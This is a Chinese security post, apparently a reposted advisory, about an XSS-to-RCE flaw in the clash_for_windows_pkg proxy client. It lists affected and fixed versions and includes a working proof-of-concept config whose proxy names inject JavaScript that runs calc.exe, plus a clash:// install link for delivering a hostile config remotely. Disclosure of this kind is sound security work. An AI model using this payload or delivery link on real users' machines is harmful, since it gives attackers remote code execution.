Clash
近几年来较高性能的代理软件,不仅支持vmess、ss、ssr等协议,还可通过自己的core来实现的相关代理协议。简单一句话:科学上网。多的不敢说了。
clash_for_windows_pkg
一款Clash的windows客户端,基于Electron开发,github上star 高达近26k,相信使用的人不少。
https://github.com/Fndroid/clash_for_windows_pkg漏洞简述
如果攻击者将代理的名字修改为Payload,就会触发XSS,从而在受害者机器执行js代码,最终形成XSS-->RCE的攻击。
影响版本
clash_for_windows_pkg <= 0.19.8P.S. 0.19.9 中未完全修复,仍然存在其他漏洞触发点
安全版本
clash_for_windows_pkg >= 0.19.10
复现
导入如下的Clash配置文件
port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies:- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>type: socks5server: 127.0.0.1port: "17938"skip-cert-verify: true- name: abctype: socks5server: 127.0.0.1port: "8088"skip-cert-verify: trueproxy-groups:-name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>type: selectproxies:- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
切换到Profiles(代理),点击Profiles代理(有时不需要,会直接触发)
攻击思路
将恶意配置文件放到互联网上并使用clash://安装它,clash_for_windows_pkg 将自动下载并切换到此配置。
clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE参考链接
https://github.com/Fndroid/clash_for_windows_pkg/issues/2710原文始发于微信公众号(我不是Hacker):科学上网客户端 clash_for_windows_pkg 从XSS到RCE,你中招了吗?
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论